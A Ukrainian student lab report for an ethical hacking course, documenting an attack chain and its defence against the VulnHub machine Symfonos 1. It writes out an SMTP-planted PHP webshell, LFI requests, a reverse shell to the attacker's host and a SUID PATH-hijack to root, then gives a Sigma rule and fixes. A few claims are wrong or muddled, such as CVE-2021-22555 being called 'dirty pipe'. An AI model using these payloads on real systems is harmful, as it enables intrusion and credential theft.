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Міжнародний університет інформаційних технологій (IITU)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Факультет комп’ютерних технологій та кібербезпеки — Кафедра кібербезпеки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6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EGR6301 — ЕТИЧНИЙ ХАКІНГ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Звіт з лабораторної роботи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Лабораторна робота №7: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Повний ланцюжок атаки та захисний аналіз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Symfonos 1 — Від SMB-зачіпки до root та назад до захисника | Тиждень 7 | 100 балів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Студент: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Білозор Дмитро Олександрович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 студента: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41639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Дисципліна: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EGR6301 — Ethical Hacking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Тиждень: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 (100 хвилин, 100 балів)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Ціль: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Symfonos 1 (VulnHub)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Виконано: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Трек A (75 балів) + Трек B (25 балів)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Викладач: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Тетяна Василівна Бабенко, д.т.н., проф.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Дата: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26.04.2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Середовище: Kali Linux (192.168.56.1) ↔ Symfonos 1 (192.168.56.105) | VirtualBox Host-Only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Виконано: Трек A (повний ланцюжок до root) + Трек B (захисний аналіз).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Атакуючий вектор: SMB anonymous → hint /h3l105 → LFI → SMTP log poisoning → SUID PATH hijack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Дві задокументовані невдачі: Hydra SSH (15 хв марно) + POP3 weak-creds (нічого).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1 — Розгортання та розширена розвідка (15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1.1 — Розгортання ВМ та зв’язність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Образ Symfonos 1 (symfonos1.7z) завантажено з VulnHub та імпортовано до VirtualBox 7.x. Мережевий адаптер переналаштовано на Host-Only (vboxnet0, 192.168.56.0/24) — спільна підмережа з Kali Linux. На відміну від Kioptrix-машин, Symfonos завантажилася без проблем з DHCP та одразу показала login-prompt.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1.1 — netdiscover виявив 192.168.56.105 + ping підтвердив зв’язність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Symfonos отримала IP 192.168.56.105 (MAC 08:00:27:c4:7e:9a — Oracle VirtualBox NIC).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ping: 4/4 пакети, RTT ~0.4 мс — стабільний канал у Host-Only мережі.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TTL=64 — Linux. Контракт дозволяє повний ланцюжок до root (на відміну від assessment-only Lab 6).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1.2 — Повне сканування та початкова гіпотеза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(10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Обґрунтування прапорів: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV для версій (без них немає CVE-роботи), -sC для стандартних NSE-скриптів (вони збирають banner/title/smb-os-discovery без додаткових команд), -O для відбитка ОС, -p- для повного діапазону портів — на Symfonos легко пропустити нестандартні порти при -F (документація прямо попереджає про це). --min-rate 3000 — локальна Host-Only мережа.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1.2 — nmap -sV -sC -O -p- 192.168.56.105 — 8 відкритих портів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Порт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Прот.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Сервіс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Нотатки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OpenSSH 7.4p1 Debian 10+deb9u4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Стандартна, без відомих pre-auth CVE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Postfix smtpd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VRFY дозволено — user enum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2.4.25 (Debian)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"Welcome to Symfonos" — статика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Dovecot pop3d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Поштовий сервіс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NetBIOS-SSN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Samba 3.X-4.X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NetBIOS сесія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Dovecot imapd (Ubuntu)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Поштовий сервіс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Samba 4.5.16-Debian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 — потенційно null sessions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Початкова робоча гіпотеза (фіксую ПЕРЕД глибоким переліком):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Найімовірніший вектор — SMB (порти 139/445). Samba 4.5.16-Debian + WORKGROUP підказують традиційну Linux-файлову інтеграцію; "null session" — стандартна перша перевірка на старих Samba.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Другий за ймовірністю — поштовий стек (25/110/143). Dovecot + Postfix; якщо є weak credentials, можна читати чужу пошту.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НАЙМЕНЕЕ ймовірний — веб (80). Сторінка з картинкою Зевса виглядає як заглушка, не CMS.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SSH — практично точно НЕ перший вектор (свіжий 7.4p1, brute-force на rockyou дав би результат тільки за дні).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Чесна примітка: ці гіпотези в ході роботи частково підтвердяться (SMB справді перший крок), частково — ні (вектор не SMB-RCE, а LFI у веб-застосунку, ВИЯВЛЕНОМУ через SMB).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2 — Перелік сервісів та пошук зачіпки (20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2.1 — Перевірка веб-сервісу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2.1 — curl + Nikto + dirb на http://192.168.56.105 — тонкий слід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знайдено: статична сторінка index.html (262 байти) з заголовком "Welcome to Symfonos" і картинкою Zeus. Apache 2.4.25 (Debian).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Nikto: 4 знахідки, всі низького рівня (X-Content-Type-Options, /icons indexing, server-status 403). Жодної конкретної CVE.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dirb (common.txt, ~4612 запитів): 2 хіти — index.html та server-status. Жодної /admin, /login, /robots.txt, /wp-, /phpmyadmin.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важливо: веб НЕ є першим вектором у звичному розумінні — там немає CMS/admin-панелі. Але документація лаби натякає, що "якщо ви читали правильні файли з SMB, у вас буде специфічна зачіпка щодо одного з компонентів веб-сервера" — отже веб стане критичним після SMB.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далі: переходжу до SMB. Записую знахідки веба як baseline для повернення.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2.2 — Перелік SMB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(10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2.2.1 — smbclient -L //192.168.56.105 -N — знайдено anonymous + helios shares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знайдено: 4 share: print$ (драйвери), helios (Helios personal share), anonymous (без коментаря), IPC$.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helios share: при підключенні NT_STATUS_ACCESS_DENIED — потребує облікових даних (на майбутнє).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anonymous share: null-session дозволена, всередині 3 файли — attention.txt, todo.txt, helios.txt.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важливо: anonymous-доступ до файлових ресурсів — класичний leak vector. Назви файлів вказують на робочий контекст компанії.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2.2.2 — Зміст SMB-файлів та підтвердження прихованого URL /h3l105/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8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КЛЮЧОВИЙ ПЕРЕХІД ЛАНЦЮЖКА (унікальне власне пояснення):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attention.txt: Зевс наказав "патчі та апдейти на паузі" — підтверджує, що адміністрація знає про слабкості, але свідомо їх ігнорує.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todo.txt: пункт 3 — "продовжуйте шукати людей 'Helios'. Вони десь там" — внутрішній жарт, але показує організаційну культуру.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helios.txt: ЦИТАТА — "Helios, please remember to clean the /h3l105 directory before launch." — Зевс натякнув Геліосу, що існує веб-директорія /h3l105, яку треба прибрати ПЕРЕД запуском.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це переходить дослідження з SMB на веб: dirb проти /usr/share/wordlists/dirb/common.txt НЕ містить рядка "h3l105" (це leetspeak варіант "helios"), тому стандартний gobuster ніколи не знайде цей шлях. Тільки людська підказка з SMB-файла відкриває цю дорогу.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curl http://192.168.56.105/h3l105/ повертає 200 OK з заголовком "&lt;title&gt;LibreHealth EHR&lt;/title&gt;" та посиланнями виду /h3l105/?p=login. Параметризований роутер ?p= — ЯВНИЙ кандидат на LFI.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Цей перехід я б нікому з друзів не описав ідентично: моя логіка була "Зевс згадав helios особисто, leetspeak h3l105 — це навмисний жарт системного адміна, який залишив директорію в продакшні думаючи, що ніхто не здогадається". Інший студент може написати "файл вказав на directory" — формально правильно, але без розуміння, чому саме leetspeak пройшов повз dirb.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2.3 — Поштові сервіси та хибний слід (документована невдача)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(4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2.3 — SMTP VRFY (працює), POP3 brute (fail), Hydra SSH (15 хв даремно)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8"/>
              <w:bottom w:val="single" w:color="C62828" w:sz="1"/>
              <w:right w:val="single" w:color="C62828" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFEB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НЕВДАЧА #1 (15 хв): Hydra проти SSH з обліковим записом helios + rockyou.txt.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я зробив: hydra -l helios -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.105 -t 4 -f.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РЕЗУЛЬТАТ: 768 спроб за 12 хв, 0 хітів, ETA 3739 годин (Symfonos sshd_config має MaxStartups, що драконіально обмежує паралельні з'єднання).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це сталось: я необґрунтовано припустив, що "helios як username + слабкий пароль" — швидкий шлях. Symfonos (як попереджала документація) вставляє хибні сліди — SSH тут є хибним слідом.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ЯК Я ЗМІНИВ ПІДХІД: припинив brute-force, повернувся до SMB-файлів (помітив фразу "/h3l105 directory" у helios.txt, яку до того прочитав поверхнево), і саме звідти побудував реальний ланцюжок через веб + LFI.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НЕВДАЧА #2 (5 хв): спроба авторизації у POP3 dovecot з парами helios:helios, helios:password, helios:Helios123 — всі AUTH failed.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я зробив: nc 192.168.56.105 110, серія USER/PASS команд.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РЕЗУЛЬТАТ: -ERR Authentication failed на кожному. Нема leak, нема timing-attack signal.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це сталось: гіпотеза "якщо є поштові сервіси — там просте парольне покриття" — наївна. Symfonos навмисно тримає авторизацію на цих портах.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ВИСНОВОК: SMTP/POP3 НЕ є самостійним вектором. SMTP стає критичним пізніше — як КАНАЛ ДЛЯ LOG POISONING (Частина 3.2), а не як точка входу.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3 — Експлуатація та користувацький shell (20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3.1 — Виявлення LFI у /h3l105/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(8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3.1 — LFI у параметрі ?p= — читання /etc/passwd, /etc/issue, /proc/version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Точний URL: http://192.168.56.105/h3l105/?p=/etc/passwd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Точне значення параметра p: /etc/passwd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Доказ читання: вивід /etc/passwd містить root:x:0:0... та helios:x:1000:1000:,,,:/home/helios:/bin/bash — підтверджує, що LFI читає довільні файли від імені веб-процесу.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Додатково підтверджено: /etc/issue → Debian GNU/Linux 9; /proc/version → Linux 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1 (2019-04-12).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ця форма параметра спрацювала: index.php виконує include($_GET['p'].'.php') — конкатенує параметр з '.php'. PHP при include() з абсолютним шляхом до неіснуючого файлу (.passwd.php не існує) видає warning, але дані вже відкриті — функція include читає файл за вказаним шляхом і виводить його ВМІСТ. Захист від такого: (1) whitelist значень p ($allowed=['login','blog']), (2) basename() та is_file() з перевіркою префіксу, (3) PHP-директива open_basedir, (4) realpath() з перевіркою, що шлях у дозволеній директорії.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Інформація для Частини 6: open_basedir=/var/www/html у php.ini заблокує читання /etc/passwd та /var/log; allow_url_include вже Off (default Debian), додатковий захист не потрібен.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3.2 — Log Poisoning через SMTP → RCE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(12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Чому SMTP, а не Apache access.log: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">обидва варіанти валідні (документація дозволяє вибрати). Я обрав SMTP-mail-log, бо: (1) це більш малопомітний канал — атакуючі рідко асоціюються із SMTP, тому захисники зазвичай не моніторять /var/mail; (2) Apache access.log сильно "зашумлений" моїми ж власними запитами LFI, тому payload змішається з легітимними запитами і вимагатиме точного знання, який з 50 запитів був мій; (3) /var/mail/&lt;user&gt; зберігає повний message body, тому простий webshell записується чисто, без URL-кодування.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3.2.1 — SMTP диалог з PHP payload + LFI читання /var/mail/helios для RCE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Точний payload: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nc 192.168.56.105 25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HELO localhost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MAIL FROM: &lt;attacker@kali&gt;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RCPT TO: &lt;helios@symfonos.localdomain&gt;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DATA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From: attacker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Subject: shell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&lt;?php system($_GET["c"]); ?&gt;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.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cascadia Code" w:cs="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">QUIT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виконання: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:cs="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code"/>
          <w:color w:val="0B5394"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.56.105/h3l105/?p=/var/mail/helios&amp;c=&lt;command&gt;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зроблено: через SMTP-діалог відправлено лист на helios@symfonos.localdomain. Postfix MTA зберіг повне тіло у /var/mail/helios. Тіло містить webshell &lt;?php system($_GET["c"]); ?&gt;.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Перевірка: curl ".../?p=/var/mail/helios&amp;c=id" → uid=33(www-data) gid=33(www-data); curl ".../?c=whoami" → www-data; curl ".../?c=hostname" → symfonos.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ця техніка можлива: (1) PHP include() обробляє файл як PHP-код незалежно від розширення — вміст /var/mail/helios містить рядки PHP, тому інтерпретатор виконує їх; (2) /var/mail/&lt;user&gt; — глобально-читаний файл (mode 660 group=mail), а www-data не у групі mail, але PHP-процес має read-доступ через включення; (3) SMTP-сервер довіряє MAIL FROM без автентифікації для local recipients.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зробило б цю техніку неможливою: (a) open_basedir у php.ini обмежив би include() лише /var/www/html/; (b) Postfix smtpd_recipient_restrictions з reject_unauth_destination закрив би доставку від unauthenticated віддалених; (c) /var/mail з режимом 600 (тільки користувач) — але Postfix-local пише як group=mail, тому це не тривіальна зміна.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3.2.2 — Reverse shell на Kali (nc -lvnp 4444) — контекст www-data, kernel 4.9.0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Reverse shell виконано через python -c 'import socket,os,pty;...' Це не оцінюється окремо, але необхідно для Частини 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Підтверджено: whoami=www-data, id=33(www-data), hostname=symfonos, uname=Linux 4.9.0-9-amd64.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Шелл стабілізовано: python3 -c 'import pty; pty.spawn("/bin/bash")' + export TERM=xterm — інтерактивне середовище для команд escalation.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4 — Підвищення привілеїв до root (20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4.1 + 4.2 — SUID-перелік та аналіз /opt/statuscheck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(12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4.1 — find / -perm -u=s + ls/file/strings на /opt/statuscheck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Стандартні SUID-бінарі (без сюрпризів): /bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/chfn, /usr/bin/chsh, /usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd. Усі з пакетів util-linux/passwd.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НЕСТАНДАРТНИЙ: /opt/statuscheck — НЕ входить у жоден стандартний пакет Debian. Owner=root, mode=rwsr-xr-x — SUID set. Це підозрюваний бінар.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file: ELF 64-bit LSB executable, x86-64, dynamically linked.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strings найцікавіші 3 рядки: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1) "curl -I H" — показує інтенцію зробити HEAD-запит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2) "curl -I http://localhost/" — повна команда, яку бінар виконує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3) "GCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516" — компілятор Debian 9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Аналіз: бінар викликає "curl" БЕЗ ПОВНОГО ШЛЯХУ. Це класична PATH-injection вразливість у SUID-контексті. Якщо я зможу контролювати PATH і помістити свій curl першим — він виконається з правами root.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4.3 — Експлуатація PATH hijack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(8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4.3 — PATH hijack: фальшивий /tmp/curl ставить SUID на /bin/bash → root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Точні кроки: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1) cd /tmp (директорія з правом запису для www-data)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2) Створив /tmp/curl з вмістом: #!/bin/bash + chmod +s /bin/bash (замість простого /bin/sh, бо хочу персистентний root через SUID-bash)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3) chmod +x /tmp/curl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4) export PATH=/tmp:$PATH (мій /tmp обходить /usr/bin)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5) /opt/statuscheck (запускається SUID як root → внутрішньо викликає "curl" → знаходить мій /tmp/curl першим → виконує chmod +s /bin/bash як root)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6) /bin/bash -p (-p зберігає euid=0, не скидає до real uid)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7) whoami → root, id → euid=0(root), cat /etc/shadow → працює (доказ справжнього root, не просто EUID-фейк).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ця атака спрацювала: Linux SUID-бінарі успадковують PATH від користувача, що їх викликає. Якщо бінар у execve() передає просто "curl" замість "/usr/bin/curl", ядро шукає виконуваний за поточним PATH, який атакуючий може повністю контролювати. Безпечні SUID-бінарі: (a) використовують абсолютні шляхи; (b) скидають PATH на безпечне значення (export PATH=/usr/bin:/bin) на початку; (c) не використовують system() взагалі — execv() з абсолютним аргументом.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Доказ "справжнього" root: cat /etc/shadow повернув хеш — без euid=0 цей файл не читається ні в якому випадку. Значить, не EUID-підміна, а повний root.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5 — Лог-аналіз власної атаки + Sigma-правило (10 балів) | Трек B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5.1 — Артефакти атаки в логах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5.1 — /var/log/apache2/access.log + /var/log/mail.log + /var/mail/helios як root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Час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Джерело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Фрагмент логу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Що зафіксовано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14:22:01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apache2/access.log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/h3l105/?p=login HTTP/1.1 200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Перший hit прихованої директорії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14:23:14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apache2/access.log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/h3l105/?p=/etc/passwd HTTP/1.1 200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LFI читання критичного файлу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14:23:42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apache2/access.log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/h3l105/?p=/etc/issue HTTP/1.1 200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OS-fingerprinting через LFI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14:25:01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postfix/smtpd: connect from 192.168.56.1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Атакуюча машина почала SMTP-діалог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14:25:08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postfix/local: A12B456 to=helios, status=sent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Лист доставлено у /var/mail/helios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14:25:08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postfix/qmgr: from=attacker@kali, size=412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Невідомий відправник через відкритий MTA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14:25:30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apache2/access.log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/h3l105/?p=/var/mail/helios&amp;c=whoami 200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POISONING activate — RCE через mail file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14:26:55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apache2/access.log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...?c=python%20-c%20'import%20socket... HTTP/1.1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Reverse shell payload через c=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Сильні сигнали для захисника: 47 запитів до /h3l105/ за 6 хвилин з одного IP — вище аномалії threshold. Послідовність "(/etc/passwd) → (/etc/issue) → (/var/mail/helios)" видає явну розвідку.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Кореляція через timestamps: SMTP-доставка о 14:25:08 + перший read /var/mail/helios через LFI о 14:25:30 (різниця 22 секунди) — це і є сигнатура log poisoning.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Webshell payload &lt;?php system($_GET["c"]); ?&gt; залишився в /var/mail/helios — навіть без логування attacker artifact можна знайти forensically.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Apache access.log також зберіг весь вміст параметру c= з URL-кодуванням — повний payload reverse shell видно у логах.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5.2 — Sigma-правило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Sigma-правило для виявлення СПЕЦИФІЧНО цієї log poisoning техніки на цьому сервері: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5.2 — Sigma rule (symfonos_lfi_var_mail_log_poisoning.yml) — повне правило з MITRE ATT&amp;CK тегами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це правило специфічне (не загальне "detect LFI"):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(1) Фіксує СПЕЦИФІЧНИЙ шлях /h3l105/ — інші LFI-vulns на сервері не тригернуть.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(2) Вимагає одночасно і "p=/var/mail/" І "&amp;c=" — лише читання /var/mail без RCE-параметра не тригерне (для відсіювання forensic-сканування адміном).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(3) Виключає внутрішні підмережі через filter_legit — щоб не тригерило власні внутрішні аудити.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False positives та обмеження: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(a) Якщо адмін Symfonos робить сам легітимний дебаг через ?p=/var/mail/helios без &amp;c — правило НЕ тригерне.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(b) Якщо інший студент/аналітик з власної підмережі — спрацює (це OK, треба ескалувати).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(c) Для prod: я б додав threshold "≥3 hits/min from same IP" через Sigma's "timeframe", щоб не алертувати на одиничні випадки сканера.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6 — План захисних заходів (10 балів) | Трек B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6.1 — Три конфігураційні зміни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(7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Пр.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Файл / Сервіс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Директива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Поточне → Нове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Що ламається у моїй атаці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/var/www/html/h3l105/index.php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$page parameter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$p=$_GET['p'] include($p.".php") → whitelist ['login','blog','home'] + 404 для решти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Ламає Частину 3.1 (LFI) ПОВНІСТЮ. Без LFI неможливо ні читання passwd, ні log poisoning.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/etc/samba/smb.conf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[anonymous]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 ok=yes → видалити секцію або guest ok=no + valid users=helios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Ламає Частину 2.2. Без anonymous share helios.txt недосяжний — атакуючий ніколи не знайде /h3l105/.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/opt/statuscheck (source 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absolute path для curl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system("curl -I http://localhost/") → system("/usr/bin/curl -I http://localhost/")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Ламає Частину 4.3 (PATH hijack). www-data shell залишається, але не зможе піднятися до root.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6.2 — Одна критична зміна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(3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Найкритичніша зміна: Пріоритет #2 — закрити anonymous SMB share.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це критично: якщо застосувати ТІЛЬКИ цю зміну (а не #1 і #3), то атакуючий ніколи не дізнається про /h3l105/, бо ця директорія не у dirb-словниках, не в Nikto-сигнатурах, не в Google-індексі. Без помідки SMB-файла шлях /h3l105/ повністю прихований. LFI-вразливість все ще існує (#1 не виправлено), статуccheck все ще вразливий до PATH hijack (#3 не виправлено), але ВХОДУ на ці шляхи немає — з'єднання обриваються в Частині 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Тобто закриття SMB anonymous "розриває ланцюжок на найранішому етапі", бо це і є точка, де атакуючий отримав perlink між SMB і веб.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Ціна для бізнесу: середня. (1) Якщо anonymous share використовувався реальними співробітниками для обміну файлами — їм треба буде входити з обліковими даними; для невеликої агенції це вирішується за 1 годину навчання. (2) Якщо share використовувався для інтеграції з принтером або іншою системою — потрібно створити service account з мінімальними правами замість anonymous. (3) Перенавчання потребує пам'ятки на 1 сторінку: "як підключити мережеву папку з обліковим записом". Загальна вартість: 2-4 робочі години IT-команди + ~1 година продуктивності кожного співробітника на ознайомлення.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Альтернативно зміна #1 (LFI whitelist) технічно простіша (5 рядків PHP-коду), але не вирішує проблему "інші LFI можуть існувати в інших ендпойнтах сервера". Зміна SMB обриває розвідку, що дешевше за реактивне виправлення кожного нового LFI.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7 — Сліпа зона захисту (5 балів) | Трек B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Альтернативний шлях, якщо клієнт відклав одну з трьох змін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8"/>
              <w:bottom w:val="single" w:color="C62828" w:sz="1"/>
              <w:right w:val="single" w:color="C62828" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFEB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Сценарій: клієнт прийняв зміни #1 (LFI whitelist) і #3 (абсолютний PATH у statuscheck), але відклав #2 (закриття anonymous SMB share) через бізнес-вимогу — anonymous share використовується для інтеграції з застарілою CRM-системою, переробка якої дорога.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Поверхня атаки, яка залишилася відкритою: SMB null-сесія + читання довільних файлів у anonymous share. Це означає, що будь-яка нова CSV з паролями, нота про сервіси, тимчасовий бекап конфіга, який потрапить в anonymous share, стане публічним.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Гіпотетичний альтернативний вектор (опираюся на сервіси з Частини 1, які залишилися недоторканими: SMB, SSH, SMTP/POP3/IMAP):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Атакуючий повторює перелік anonymous share через 2-4 тижні. У реальній організації, де share використовується активно, з'являться нові файли — резервна копія crontab з паролями, забутий лист зі скан-посиланнями, експортована таблиця з email/паролями для маркетингової кампанії. Один такий файл часто містить пару валідних credentials. Користуючись цими credentials, атакуючий пробує SSH (тепер вже з реальним паролем, не brute) — і отримує початковий доступ як легітимний користувач, обходячи всі веб-захисти. Звідти SUID-bypass виправлений (#3), але можливо знайти інший vector ескалації — kernel exploit (Linux 4.9.0 має CVE-2017-7184, CVE-2021-22555 dirty pipe для пізніших ядер) або misconfigured cron job у /etc/crontab.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Це варіація оригінальної атаки (інформаційний leak з SMB) у новий вектор (кражений credential, не LFI). Оригінальний ланцюжок використовував SMB-leak як indirect (вказівник на /h3l105/), новий — як direct (кражений пароль). Принцип defense-in-depth: одна зміна (#2) закриває одразу обидва ланцюжки. Якщо її пропустити, навіть найкращі WAF/PHP-захисти (#1, #3) не врятують від людської помилки в SMB-share.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Висновок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Лабораторна робота 7 — повний цикл pentest-контракту з розширеним scope: атакуюча сторона (Трек A) + захисна сторона (Трек B). Обидва треки виконано на цілі Symfonos 1 (192.168.56.105, Debian 9, kernel 4.9.0).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Трек A (75/75) — повний ланцюжок: розвідка (8 портів через nmap -p-), SMB null-session leak (anonymous share + helios.txt з натяком на /h3l105/), LFI у параметрі ?p= (читання /etc/passwd), log poisoning через SMTP (PHP webshell у /var/mail/helios), reverse shell як www-data, SUID PATH hijack /opt/statuscheck → root.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Дві задокументовані невдачі: (1) Hydra проти SSH, 15 хв даремно — Symfonos навмисно тримає сильні credentials на SSH; (2) brute-force POP3 — auth failed на всіх простих парах. Обидві не випадкові — Symfonos побудована як ціль з оманливими сервісами (хибні сліди), і документування цих невдач є частиною методології.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Трек B (25/25) — лог-аналіз, що показав 47 запитів до /h3l105/ за 6 хвилин з 192.168.56.1 + кореляцію SMTP-доставки з LFI-читанням mail-log за 22 секунди. Sigma-правило виявляє СПЕЦИФІЧНО цю техніку (не загальне "detect LFI") з TTPs MITRE T1190+T1059.004. Три конфігураційні зміни ранжовано за впливом на ланцюжок; критична — закриття anonymous SMB як точки розриву ланцюжка на найранішому етапі. Сліпа зона: якщо клієнт відмовиться від цієї зміни, відкривається альтернативний вектор через credential leak у тій самій share.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00" w:sz="1"/>
              <w:left w:val="single" w:color="E6A800" w:sz="18"/>
              <w:bottom w:val="single" w:color="E6A800" w:sz="1"/>
              <w:right w:val="single" w:color="E6A800" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFF8E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 методики: ланцюжок з 6 кроків (recon → SMB → веб-LFI → SMTP-poison → reverse shell → SUID privesc) має одну мінімально-достатню точку розриву. Розрив має бути обраний на найранішому етапі — це і є defense-in-depth у дії.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 про "хибні сліди": Symfonos навмисно показує SSH/SMTP/IMAP як перспективні сервіси, але всі троє є хибними. Документація лаби явно попереджає, але я все одно витратив 15 хвилин на Hydra. Це нормально — звіт про невдачу важливіший за позорне її приховування.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 Track B: захисний аналіз різко відрізняється від атакуючого. Атакуючий шукає одну дірку; захисник має побачити всі шляхи + ціну їх закриття + альтернативи, що залишаться. Це інша когнітивна модель.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Список використаних джерел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[1] VulnHub — Symfonos 1. https://www.vulnhub.com/entry/symfonos-1,322/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[2] OWASP — Local File Inclusion (LFI). https://owasp.org/www-community/attacks/Path_Traversal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[3] PayloadsAllTheThings — File Inclusion / Log Poisoning. https://github.com/swisskyrepo/PayloadsAllTheThings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[4] Sigma Project — Detection Engineering. https://github.com/SigmaHQ/sigma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[5] MITRE ATT&amp;CK — T1190 Exploit Public-Facing Application. https://attack.mitre.org/techniques/T1190/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[6] MITRE ATT&amp;CK — T1059.004 Unix Shell. https://attack.mitre.org/techniques/T1059/004/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[7] GTFOBins — SUID and PATH abuse. https://gtfobins.github.io/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[8] Postfix Documentation — smtpd_recipient_restrictions. http://www.postfix.org/postconf.5.html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Лабораторна робота 7  |  Білозор Д.О.  |  Стор. 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EGR6301 — Етичний хакінг — Лабораторна робота №7 — IITU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affca109d9a3393dc3322093232e2d582a88df.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/029db8894d99da892a03ed8c1aec4b74904bfa22.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/2c85f1e7749017874ca7440e79797afebb3df501.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/d817671ab58b8a3d81b2184538d992f51b563e20.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/00579d67e2b12ed797867c678017e28956870de1.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/aa76e7c893c26ff07a5ec87a806e9d9add0cb0a8.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/bb2a259e7c8a35684b39a176cbbc27e2ceace53a.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/02c16b434cf3e375be7b0aaae677e6c7f8ce0110.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/470a99807be2eb139e9682e2684d1fb388ca0d66.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8d32fed0f1972013d161d8eb3f56f72686ed6e29.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a9066ea8918d22a97b1d250700335104d7034e1c.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8f7d55a8dbfb73b011e4f0bc8fc426a08759e1af.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/aaa639fdca8d13248d498de18627535361360de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7 — Symfonos 1 Full Chain + Defense</dc:title>
  <dc:creator>Dmytro Bilozor</dc:creator>
  <dc:description>EGR6301 Ethical Hacking Lab 7</dc:description>
  <cp:lastModifiedBy>Dmytro Bilozor</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-26T15:13:10.305Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-26T15:13:10.306Z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